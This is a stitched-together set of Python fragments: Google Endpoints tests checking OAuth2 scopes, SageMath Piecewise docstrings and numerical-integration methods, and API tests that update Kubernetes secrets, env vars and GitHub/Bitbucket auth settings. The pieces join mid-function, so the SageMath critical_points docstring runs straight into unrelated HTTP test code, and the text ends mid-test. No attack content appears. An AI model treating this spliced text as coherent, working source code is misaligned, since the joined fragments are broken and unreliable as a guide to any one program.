auth_level=api_config.AUTH_LEVEL.REQUIRED,
allowed_client_ids=users_id_token.SKIP_CLIENT_ID_CHECK)
class IataApi(remote.Service):
@api_config.method(
IATA_RESOURCE,
Airport,
path='airport/{iata}',
http_method='GET',
name='get_airport')
def get_airport(self, request):
return Airport(iata=request.iata, name='irrelevant')
doc = self.generator.get_discovery_doc([IataApi])
auth = doc['auth']
assert auth == {
'oauth2': {
'scopes': {
'https://www.googleapis.com/auth/userinfo.email': {
'description': 'View your email address'
}
}
}
}
def testCustomScope(self):
SCOPE = endpoints_types.OAuth2Scope(
scope='https://www.googleapis.com/auth/santa',
description='Access your letter to Santa')
IATA_RESOURCE = resource_container.ResourceContainer(
iata=messages.StringField(1)
)
class IataParam(messages.Message):
iata = messages.StringField(1)
class Airport(messages.Message):
iata = messages.StringField(1, required=True)
name = messages.StringField(2, required=True)
@api_config.api(
name='iata', version='v1', scopes=[SCOPE],
auth_level=api_config.AUTH_LEVEL.REQUIRED,
allowed_client_ids=users_id_token.SKIP_CLIENT_ID_CHECK)
class IataApi(remote.Service):
@api_config.method(
IATA_RESOURCE,
Airport,
path='airport/{iata}',
http_method='GET',
name='get_airport')
def get_airport(self, request):
return Airport(iata=request.iata, name='irrelevant')
doc = self.generator.get_discovery_doc([IataApi])
auth = doc['auth']
assert auth == {
'oauth2': {
'scopes': {
SCOPE.scope: {
'description': SCOPE.description
}
}
}
}
EXAMPLES::
sage: f1(x) = 1
sage: f2(x) = 1 - x
sage: f = Piecewise([[(0,1),f1],[(1,2),f2]])
doctest:...: DeprecationWarning: use lower-case piecewise instead
See http://trac.sagemath.org/14801 for details.
sage: f.extend_by_zero_to(-1, 3)
doctest:...: DeprecationWarning: use lower-case piecewise instead
See http://trac.sagemath.org/14801 for details.
Piecewise defined function with 4 parts, [[(-1, 0), 0], [(0, 1), x |--> 1], [(1, 2), x |--> -x + 1], [(2, 3), 0]]
"""
zero = QQ['x'](0)
list_of_pairs = self.list()
a, b = self.domain()
if xmin < a:
list_of_pairs = [[(xmin, a), zero]] + list_of_pairs
if xmax > b:
list_of_pairs = list_of_pairs + [[(b, xmax), zero]]
return Piecewise(list_of_pairs)
def unextend(self):
"""
This removes any zero pieces at the front or back of the function
(the inverse of extend_by_zero_to).
EXAMPLES::
sage: R.<x> = QQ[]
sage: f = Piecewise([[(-3,-1),1+2+x],[(-1,1),1-x^2]])
doctest:...: DeprecationWarning: use lower-case piecewise instead
See http://trac.sagemath.org/14801 for details.
sage: e = f.extend_by_zero_to(-10,10); e
Piecewise defined function with 4 parts, [[(-10, -3), 0], [(-3, -1), x + 3], [(-1, 1), -x^2 + 1], [(1, 10), 0]]
sage: d = e.unextend(); d
doctest:...: DeprecationWarning: use lower-case piecewise instead
See http://trac.sagemath.org/14801 for details.
Piecewise defined function with 2 parts, [[(-3, -1), x + 3], [(-1, 1), -x^2 + 1]]
sage: d==f
True
"""
list_of_pairs = self.list()
funcs = self.functions()
if funcs[0] == 0:
list_of_pairs = list_of_pairs[1:]
if funcs[-1] == 0:
list_of_pairs = list_of_pairs[:-1]
return Piecewise(list_of_pairs)
def _riemann_sum_helper(self, N, func, initial=0):
"""
A helper function for computing Riemann sums.
INPUT:
- ``N`` - the number of subdivisions
- ``func`` - a function to apply to the endpoints of
each subdivision
- ``initial`` - the starting value
EXAMPLES::
sage: f1(x) = x^2 ## example 1
sage: f2(x) = 5-x^2
sage: f = Piecewise([[(0,1),f1],[(1,2),f2]])
doctest:...: DeprecationWarning: use lower-case piecewise instead
See http://trac.sagemath.org/14801 for details.
sage: f._riemann_sum_helper(6, lambda x0, x1: (x1-x0)*f(x1))
19/6
"""
a,b = self.domain()
rsum = initial
h = (b-a)/N
for i in range(N):
x0 = a+i*h
x1 = a+(i+1)*h
rsum += func(x0, x1)
return rsum
def riemann_sum_integral_approximation(self, N, mode=None):
"""
Returns the Riemann sum approximation of the definite integral
based on a subdivision into N subintervals.
Set mode="midpoint" for the height of the rectangles to be
determined by the midpoint of the subinterval; set mode="right" for
the height of the rectangles to be determined by the right-hand
endpoint of the subinterval; the default is mode="left" (the height
of the rectangles is determined by the left-hand endpoint of
the subinterval).
EXAMPLES::
sage: f1(x) = x^2 ## example 1
sage: f2(x) = 5-x^2
sage: f = Piecewise([[(0,1),f1],[(1,2),f2]])
doctest:...: DeprecationWarning: use lower-case piecewise instead
See http://trac.sagemath.org/14801 for details.
sage: f.riemann_sum_integral_approximation(6)
17/6
sage: f.riemann_sum_integral_approximation(6,mode="right")
19/6
sage: f.riemann_sum_integral_approximation(6,mode="midpoint")
3
sage: f.integral(definite=True)
3
"""
if mode is None:
return self._riemann_sum_helper(N, lambda x0, x1: (x1-x0)*self(x0))
elif mode == "right":
return self._riemann_sum_helper(N, lambda x0, x1: (x1-x0)*self(x1))
elif mode == "midpoint":
return self._riemann_sum_helper(N, lambda x0, x1: (x1-x0)*self((x0+x1)/2))
else:
raise ValueError("invalid mode")
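The three modes described in the docstring above can be sketched in plain Python, independent of Sage (a minimal illustration of left/right/midpoint Riemann sums, not the Piecewise implementation):

```python
def riemann_sum(f, a, b, N, mode="left"):
    """Approximate the integral of f on [a, b] with N equal subintervals."""
    h = (b - a) / float(N)
    total = 0.0
    for i in range(N):
        x0 = a + i * h          # left endpoint of the subinterval
        x1 = x0 + h             # right endpoint
        if mode == "left":
            total += h * f(x0)
        elif mode == "right":
            total += h * f(x1)
        elif mode == "midpoint":
            total += h * f((x0 + x1) / 2.0)
        else:
            raise ValueError("invalid mode")
    return total

# For f(x) = x^2 on [0, 1] with N=2, the midpoint rule gives
# 0.5*(0.25**2) + 0.5*(0.75**2) = 0.3125.
mid = riemann_sum(lambda x: x * x, 0, 1, 2, mode="midpoint")
```

For an increasing integrand the left sum underestimates and the right sum overestimates the integral, which matches the 17/6 and 19/6 values in the doctest.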
def riemann_sum(self, N, mode=None):
"""
Returns the piecewise constant function defined by the Riemann sums
in numerical integration based on a subdivision into N subintervals.
Set mode="midpoint" for the height of the rectangles to be
determined by the midpoint of the subinterval; set mode="right" for
the height of the rectangles to be determined by the right-hand
endpoint of the subinterval; the default is mode="left" (the height
of the rectangles is determined by the left-hand endpoint of
the subinterval).
EXAMPLES::
sage: f1(x) = x^2
sage: f2(x) = 5-x^2
sage: f = Piecewise([[(0,1),f1],[(1,2),f2]])
doctest:...: DeprecationWarning: use lower-case piecewise instead
See http://trac.sagemath.org/14801 for details.
sage: f.riemann_sum(6,mode="midpoint")
doctest:...: DeprecationWarning: use lower-case piecewise instead
See http://trac.sagemath.org/14801 for details.
Piecewise defined function with 6 parts, [[(0, 1/3), 1/36], [(1/3, 2/3), 1/4], [(2/3, 1), 25/36], [(1, 4/3), 131/36], [(4/3, 5/3), 11/4], [(5/3, 2), 59/36]]
::
sage: f = Piecewise([[(-1,1),(1-x^2).function(x)]])
sage: rsf = f.riemann_sum(7)
sage: P = f.plot(rgbcolor=(0.7,0.1,0.5), plot_points=40)
sage: Q = rsf.plot(rgbcolor=(0.7,0.6,0.6), plot_points=40)
sage: L = add([line([[a,0],[a,f(x=a)]],rgbcolor=(0.7,0.6,0.6)) for (a,b),f in rsf.list()])
sage: P + Q + L
Graphics object consisting of 15 graphics primitives
::
sage: f = Piecewise([[(-1,1),(1/2+x-x^3)]], x) ## example 3
sage: rsf = f.riemann_sum(8)
sage: P = f.plot(rgbcolor=(0.7,0.1,0.5), plot_points=40)
sage: Q = rsf.plot(rgbcolor=(0.7,0.6,0.6), plot_points=40)
sage: L = add([line([[a,0],[a,f(x=a)]],rgbcolor=(0.7,0.6,0.6)) for (a,b),f in rsf.list()])
sage: P + Q + L
Graphics object consisting of 17 graphics primitives
"""
if mode is None:
rsum = self._riemann_sum_helper(N, lambda x0,x1: [[(x0,x1),SR(self(x0))]],
initial=[])
elif mode == "right":
rsum = self._riemann_sum_helper(N, lambda x0,x1: [[(x0,x1),SR(self(x1))]],
initial=[])
elif mode == "midpoint":
rsum = self._riemann_sum_helper(N, lambda x0,x1: [[(x0,x1),SR(self((x0+x1)/2))]],
initial=[])
else:
raise ValueError("invalid mode")
return Piecewise(rsum)
def trapezoid(self, N):
"""
Returns the piecewise linear function defined by the trapezoid rule
for numerical integration based on a subdivision into N
subintervals.
EXAMPLES::
sage: R.<x> = QQ[]
sage: f1 = x^2
sage: f2 = 5-x^2
sage: f = Piecewise([[(0,1),f1],[(1,2),f2]])
doctest:...: DeprecationWarning: use lower-case piecewise instead
See http://trac.sagemath.org/14801 for details.
sage: f.trapezoid(4)
doctest:...: DeprecationWarning: use lower-case piecewise instead
See http://trac.sagemath.org/14801 for details.
Piecewise defined function with 4 parts, [[(0, 1/2), 1/2*x], [(1/2, 1), 9/2*x - 2], [(1, 3/2), 1/2*x + 2], [(3/2, 2), -7/2*x + 8]]
::
sage: R.<x> = QQ[]
sage: f = Piecewise([[(-1,1),1-x^2]])
sage: tf = f.trapezoid(4)
sage: P = f.plot(rgbcolor=(0.7,0.1,0.5), plot_points=40)
sage: Q = tf.plot(rgbcolor=(0.7,0.6,0.6), plot_points=40)
sage: L = add([line([[a,0],[a,f(a)]],rgbcolor=(0.7,0.6,0.6)) for (a,b),f in tf.list()])
sage: P+Q+L
Graphics object consisting of 9 graphics primitives
::
sage: R.<x> = QQ[]
sage: f = Piecewise([[(-1,1),1/2+x-x^3]]) ## example 3
sage: tf = f.trapezoid(6)
sage: P = f.plot(rgbcolor=(0.7,0.1,0.5), plot_points=40)
sage: Q = tf.plot(rgbcolor=(0.7,0.6,0.6), plot_points=40)
sage: L = add([line([[a,0],[a,f(a)]],rgbcolor=(0.7,0.6,0.6)) for (a,b),f in tf.list()])
sage: P+Q+L
Graphics object consisting of 13 graphics primitives
TESTS:
Use variables other than x (:trac:`13836`)::
sage: R.<y> = QQ[]
sage: f1 = y^2
sage: f2 = 5-y^2
sage: f = Piecewise([[(0,1),f1],[(1,2),f2]])
sage: f.trapezoid(4)
Piecewise defined function with 4 parts, [[(0, 1/2), 1/2*y], [(1/2, 1), 9/2*y - 2], [(1, 3/2), 1/2*y + 2], [(3/2, 2), -7/2*y + 8]]
"""
x = QQ[self.default_variable()].gen()
def f(x0, x1):
f0, f1 = self(x0), self(x1)
return [[(x0,x1),f0+(f1-f0)*(x1-x0)**(-1)*(x-x0)]]
rsum = self._riemann_sum_helper(N, f, initial=[])
return Piecewise(rsum)
def trapezoid_integral_approximation(self,N):
"""
Returns the approximation given by the trapezoid rule for numerical
integration based on a subdivision into N subintervals.
EXAMPLES::
sage: f1(x) = x^2 ## example 1
sage: f2(x) = 1-(1-x)^2
sage: f = Piecewise([[(0,1),f1],[(1,2),f2]])
doctest:...: DeprecationWarning: use lower-case piecewise instead
See http://trac.sagemath.org/14801 for details.
sage: P = f.plot(rgbcolor=(0.7,0.1,0.5), plot_points=40)
sage: tf = f.trapezoid(6)
sage: Q = tf.plot(rgbcolor=(0.7,0.6,0.6), plot_points=40)
sage: ta = f.trapezoid_integral_approximation(6)
sage: t = text('trapezoid approximation = %s'%ta, (1.5, 0.25))
sage: a = f.integral(definite=True)
sage: tt = text('area under curve = %s'%a, (1.5, -0.5))
sage: P + Q + t + tt
Graphics object consisting of 10 graphics primitives
::
sage: f = Piecewise([[(0,1),f1],[(1,2),f2]]) ## example 2
sage: tf = f.trapezoid(4)
sage: ta = f.trapezoid_integral_approximation(4)
sage: Q = tf.plot(rgbcolor=(0.7,0.6,0.6), plot_points=40)
sage: t = text('trapezoid approximation = %s'%ta, (1.5, 0.25))
sage: a = f.integral(definite=True)
sage: tt = text('area under curve = %s'%a, (1.5, -0.5))
sage: P+Q+t+tt
Graphics object consisting of 8 graphics primitives
"""
def f(x0, x1):
f0, f1 = self(x0), self(x1)
return ((f1+f0)/2)*(x1-x0)
return self._riemann_sum_helper(N, f)
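The trapezoid approximation computed above averages the endpoint values on each subinterval; a plain-Python sketch of the same rule (illustrative only, not the Sage implementation):

```python
def trapezoid_approximation(f, a, b, N):
    """Trapezoid-rule approximation of the integral of f over [a, b]."""
    h = (b - a) / float(N)
    total = 0.0
    for i in range(N):
        x0 = a + i * h
        x1 = x0 + h
        # Area of the trapezoid with parallel sides f(x0), f(x1) and width h.
        total += (f(x0) + f(x1)) / 2.0 * h
    return total

# For f(x) = x^2 on [0, 1] with N=4 this gives 0.34375,
# the average of the left (0.21875) and right (0.46875) Riemann sums.
approx = trapezoid_approximation(lambda x: x * x, 0, 1, 4)
```

The trapezoid rule is exact for piecewise linear integrands, which is why `trapezoid(N)` interpolates the function linearly on each subinterval before integrating.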
def critical_points(self):
"""
Return the critical points of this piecewise function.
.. warning::
Uses maxima, which prints the warning to use results with
caution. Only works for piecewise functions whose parts are
polynomials with real critical points not occurring on the
interval endpoints.
EXAMPLES::
sage: R.<x> = QQ[]
sage: f1 = x^0
sage: f2 = 10*x - x^2
sage: f3 = 3*x^4 - 156*x^3 + 3036*x^2 - 26208*x
sage: f = Piecewise([[(0,3),f1],[(3,10),f2],[(10,20),f3]])
doctest:...: DeprecationWarning: use lower-case piecewise instead
See http://trac.sagemath.org/14801 for details.
sage: expected = [5, 12, 13, 14]
sage: all(abs(e-a) < 0.001 for e,a in zip(expected, f.critical_points()))
True
TESTS:
Use variables other than x (:trac:`13836`)::
self.auth_client.get(self.url + '?keys={}'.format(
k8s_config_maps.K8S_CONFIG_MAPS_JOBS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_config_maps.K8S_CONFIG_MAPS_JOBS, to_dict=True)
assert resp.data[0]['value'] == data
# Experiment
resp = self.auth_client.get(self.url + '?keys={}'.format(
k8s_config_maps.K8S_CONFIG_MAPS_EXPERIMENTS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_config_maps.K8S_CONFIG_MAPS_EXPERIMENTS, to_dict=True)
assert resp.data[0]['value'] is None
# Update experiments config maps
resp = self.auth_client.post(self.url, data={
k8s_config_maps.K8S_CONFIG_MAPS_EXPERIMENTS: data
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
k8s_config_maps.K8S_CONFIG_MAPS_EXPERIMENTS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_config_maps.K8S_CONFIG_MAPS_EXPERIMENTS, to_dict=True)
assert resp.data[0]['value'] == data
# Notebook
resp = self.auth_client.get(self.url + '?keys={}'.format(
k8s_config_maps.K8S_CONFIG_MAPS_NOTEBOOKS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_config_maps.K8S_CONFIG_MAPS_NOTEBOOKS, to_dict=True)
assert resp.data[0]['value'] is None
# Update notebooks config maps
resp = self.auth_client.post(self.url, data={
k8s_config_maps.K8S_CONFIG_MAPS_NOTEBOOKS: data
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
k8s_config_maps.K8S_CONFIG_MAPS_NOTEBOOKS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_config_maps.K8S_CONFIG_MAPS_NOTEBOOKS, to_dict=True)
assert resp.data[0]['value'] == data
# Tensorboard
resp = self.auth_client.get(self.url + '?keys={}'.format(
k8s_config_maps.K8S_CONFIG_MAPS_TENSORBOARDS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_config_maps.K8S_CONFIG_MAPS_TENSORBOARDS,
to_dict=True)
assert resp.data[0]['value'] is None
# Update tensorboards config maps
resp = self.auth_client.post(self.url, data={
k8s_config_maps.K8S_CONFIG_MAPS_TENSORBOARDS: data
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
k8s_config_maps.K8S_CONFIG_MAPS_TENSORBOARDS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_config_maps.K8S_CONFIG_MAPS_TENSORBOARDS,
to_dict=True)
assert resp.data[0]['value'] == data
def test_secrets(self):
data = ['secret1', 'secret2']
# Build
resp = self.auth_client.get(self.url + '?keys={}'.format(
k8s_secrets.K8S_SECRETS_BUILD_JOBS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_secrets.K8S_SECRETS_BUILD_JOBS, to_dict=True)
assert resp.data[0]['value'] is None
resp = self.auth_client.post(self.url, data={
k8s_secrets.K8S_SECRETS_BUILD_JOBS: data
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
k8s_secrets.K8S_SECRETS_BUILD_JOBS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_secrets.K8S_SECRETS_BUILD_JOBS, to_dict=True)
assert resp.data[0]['value'] == data
# Job
resp = self.auth_client.get(self.url + '?keys={}'.format(
k8s_secrets.K8S_SECRETS_JOBS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_secrets.K8S_SECRETS_JOBS, to_dict=True)
assert resp.data[0]['value'] is None
# Update jobs secrets
resp = self.auth_client.post(self.url, data={
k8s_secrets.K8S_SECRETS_JOBS: data
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
k8s_secrets.K8S_SECRETS_JOBS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_secrets.K8S_SECRETS_JOBS, to_dict=True)
assert resp.data[0]['value'] == data
# Experiment
resp = self.auth_client.get(self.url + '?keys={}'.format(
k8s_secrets.K8S_SECRETS_EXPERIMENTS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_secrets.K8S_SECRETS_EXPERIMENTS, to_dict=True)
assert resp.data[0]['value'] is None
# Update experiments secrets
resp = self.auth_client.post(self.url, data={
k8s_secrets.K8S_SECRETS_EXPERIMENTS: data
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
k8s_secrets.K8S_SECRETS_EXPERIMENTS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_secrets.K8S_SECRETS_EXPERIMENTS, to_dict=True)
assert resp.data[0]['value'] == data
# Notebook
resp = self.auth_client.get(self.url + '?keys={}'.format(
k8s_secrets.K8S_SECRETS_NOTEBOOKS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_secrets.K8S_SECRETS_NOTEBOOKS, to_dict=True)
assert resp.data[0]['value'] is None
# Update notebooks secrets
resp = self.auth_client.post(self.url, data={
k8s_secrets.K8S_SECRETS_NOTEBOOKS: data
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
k8s_secrets.K8S_SECRETS_NOTEBOOKS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_secrets.K8S_SECRETS_NOTEBOOKS, to_dict=True)
assert resp.data[0]['value'] == data
# Tensorboard
resp = self.auth_client.get(self.url + '?keys={}'.format(
k8s_secrets.K8S_SECRETS_TENSORBOARDS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_secrets.K8S_SECRETS_TENSORBOARDS,
to_dict=True)
assert resp.data[0]['value'] is None
# Update tensorboards secrets
resp = self.auth_client.post(self.url, data={
k8s_secrets.K8S_SECRETS_TENSORBOARDS: data
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
k8s_secrets.K8S_SECRETS_TENSORBOARDS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(k8s_secrets.K8S_SECRETS_TENSORBOARDS,
to_dict=True)
assert resp.data[0]['value'] == data
def test_env_vars(self):
data = [['key1', 'value1'], ['key2', 'value2']]
# Build
resp = self.auth_client.get(self.url + '?keys={}'.format(
env_vars.ENV_VARS_BUILD_JOBS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(env_vars.ENV_VARS_BUILD_JOBS, to_dict=True)
assert resp.data[0]['value'] is None
resp = self.auth_client.post(self.url, data={
env_vars.ENV_VARS_BUILD_JOBS: data
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
env_vars.ENV_VARS_BUILD_JOBS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(env_vars.ENV_VARS_BUILD_JOBS, to_dict=True)
assert resp.data[0]['value'] == data
# Job
resp = self.auth_client.get(self.url + '?keys={}'.format(
env_vars.ENV_VARS_JOBS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(env_vars.ENV_VARS_JOBS, to_dict=True)
assert resp.data[0]['value'] is None
# Update jobs env vars
resp = self.auth_client.post(self.url, data={
env_vars.ENV_VARS_JOBS: data
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
env_vars.ENV_VARS_JOBS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(env_vars.ENV_VARS_JOBS, to_dict=True)
assert resp.data[0]['value'] == data
# Experiment
resp = self.auth_client.get(self.url + '?keys={}'.format(
env_vars.ENV_VARS_EXPERIMENTS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(env_vars.ENV_VARS_EXPERIMENTS, to_dict=True)
assert resp.data[0]['value'] is None
# Update experiments env vars
resp = self.auth_client.post(self.url, data={
env_vars.ENV_VARS_EXPERIMENTS: data
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
env_vars.ENV_VARS_EXPERIMENTS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(env_vars.ENV_VARS_EXPERIMENTS, to_dict=True)
assert resp.data[0]['value'] == data
# Notebook
resp = self.auth_client.get(self.url + '?keys={}'.format(
env_vars.ENV_VARS_NOTEBOOKS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(env_vars.ENV_VARS_NOTEBOOKS, to_dict=True)
assert resp.data[0]['value'] is None
# Update notebooks env vars
resp = self.auth_client.post(self.url, data={
env_vars.ENV_VARS_NOTEBOOKS: data
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
env_vars.ENV_VARS_NOTEBOOKS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(env_vars.ENV_VARS_NOTEBOOKS, to_dict=True)
assert resp.data[0]['value'] == data
# Tensorboard
resp = self.auth_client.get(self.url + '?keys={}'.format(
env_vars.ENV_VARS_TENSORBOARDS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(env_vars.ENV_VARS_TENSORBOARDS,
to_dict=True)
assert resp.data[0]['value'] is None
# Update tensorboards env vars
resp = self.auth_client.post(self.url, data={
env_vars.ENV_VARS_TENSORBOARDS: data
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
env_vars.ENV_VARS_TENSORBOARDS))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(env_vars.ENV_VARS_TENSORBOARDS,
to_dict=True)
assert resp.data[0]['value'] == data
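Each option in these tests follows the same read-default / update / read-back round trip. The pattern could be factored into a helper along these lines (a sketch with a stand-in client, not the project's `auth_client` or `conf` API):

```python
class FakeClient:
    """Stand-in for the test client: stores option values in a dict."""
    def __init__(self):
        self._store = {}

    def get(self, key):
        return self._store.get(key)

    def post(self, key, value):
        self._store[key] = value


def assert_round_trip(client, key, value, default=None):
    # Read the default, write the new value, then read it back.
    assert client.get(key) == default
    client.post(key, value)
    assert client.get(key) == value


client = FakeClient()
assert_round_trip(client, 'env_vars_jobs', [['key1', 'value1']])
```

With a helper like this, each of the config-map/secret/env-var cases above would reduce to a single call per key, making it harder for copy-pasted assertions to drift out of sync.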
def test_auth_github(self):
# enabled
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_github.AUTH_GITHUB_ENABLED))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_github.AUTH_GITHUB_ENABLED, to_dict=True)
assert resp.data[0]['value'] is False
resp = self.auth_client.post(self.url, data={
auth_github.AUTH_GITHUB_ENABLED: True
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_github.AUTH_GITHUB_ENABLED))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_github.AUTH_GITHUB_ENABLED, to_dict=True)
assert resp.data[0]['value'] is True
# verification schedule
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_github.AUTH_GITHUB_VERIFICATION_SCHEDULE))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_github.AUTH_GITHUB_VERIFICATION_SCHEDULE, to_dict=True)
assert resp.data[0]['value'] == 0
resp = self.auth_client.post(self.url, data={
auth_github.AUTH_GITHUB_VERIFICATION_SCHEDULE: 2
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_github.AUTH_GITHUB_VERIFICATION_SCHEDULE))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_github.AUTH_GITHUB_VERIFICATION_SCHEDULE, to_dict=True)
assert resp.data[0]['value'] == 2
# client id
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_github.AUTH_GITHUB_CLIENT_ID))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_github.AUTH_GITHUB_CLIENT_ID, to_dict=True)
assert resp.data[0]['value'] is None
resp = self.auth_client.post(self.url, data={
auth_github.AUTH_GITHUB_CLIENT_ID: 'foobar'
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_github.AUTH_GITHUB_CLIENT_ID))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_github.AUTH_GITHUB_CLIENT_ID, to_dict=True)
assert resp.data[0]['value'] == 'foobar'
# client secret
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_github.AUTH_GITHUB_CLIENT_SECRET))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_github.AUTH_GITHUB_CLIENT_SECRET, to_dict=True)
assert resp.data[0]['value'] is None
resp = self.auth_client.post(self.url, data={
auth_github.AUTH_GITHUB_CLIENT_SECRET: 'foobar'
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_github.AUTH_GITHUB_CLIENT_SECRET))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_github.AUTH_GITHUB_CLIENT_SECRET, to_dict=True)
assert resp.data[0]['value'] == 'foobar'
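Each option in these tests follows the same GET-default / POST / GET-updated round trip. A hypothetical helper (``assert_option_roundtrip`` is not part of the suite, just a sketch of how the repetition could be collapsed) would look like:

```python
def assert_option_roundtrip(client, url, status, key, new_value, default=None):
    """GET a config key and check its default, POST a new value,
    then GET again and check the update took effect."""
    resp = client.get(url + '?keys={}'.format(key))
    assert resp.status_code == status.HTTP_200_OK
    assert resp.data[0]['value'] == default
    resp = client.post(url, data={key: new_value})
    assert resp.status_code == status.HTTP_200_OK
    resp = client.get(url + '?keys={}'.format(key))
    assert resp.status_code == status.HTTP_200_OK
    assert resp.data[0]['value'] == new_value
```
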
def test_auth_bitbucket(self):
# enabled
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_bitbucket.AUTH_BITBUCKET_ENABLED))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_bitbucket.AUTH_BITBUCKET_ENABLED, to_dict=True)
assert resp.data[0]['value'] is False
resp = self.auth_client.post(self.url, data={
auth_bitbucket.AUTH_BITBUCKET_ENABLED: True
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_bitbucket.AUTH_BITBUCKET_ENABLED))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_bitbucket.AUTH_BITBUCKET_ENABLED, to_dict=True)
assert resp.data[0]['value'] is True
# verification schedule
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_bitbucket.AUTH_BITBUCKET_VERIFICATION_SCHEDULE))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_bitbucket.AUTH_BITBUCKET_VERIFICATION_SCHEDULE,
to_dict=True)
assert resp.data[0]['value'] == 0
resp = self.auth_client.post(self.url, data={
auth_bitbucket.AUTH_BITBUCKET_VERIFICATION_SCHEDULE: 2
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_bitbucket.AUTH_BITBUCKET_VERIFICATION_SCHEDULE))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_bitbucket.AUTH_BITBUCKET_VERIFICATION_SCHEDULE,
to_dict=True)
assert resp.data[0]['value'] == 2
# client id
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_bitbucket.AUTH_BITBUCKET_CLIENT_ID))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_bitbucket.AUTH_BITBUCKET_CLIENT_ID, to_dict=True)
assert resp.data[0]['value'] is None
resp = self.auth_client.post(self.url, data={
auth_bitbucket.AUTH_BITBUCKET_CLIENT_ID: 'foobar'
})
assert resp.status_code == status.HTTP_200_OK
resp = self.auth_client.get(self.url + '?keys={}'.format(
auth_bitbucket.AUTH_BITBUCKET_CLIENT_ID))
assert resp.status_code == status.HTTP_200_OK
assert resp.data[0] == conf.get(auth_bitbucket.AUTH_BITBUCKET_CLIENT_ID, to_dict=True)
assert resp.data[0]['value'] == 'foobar'
# client secret
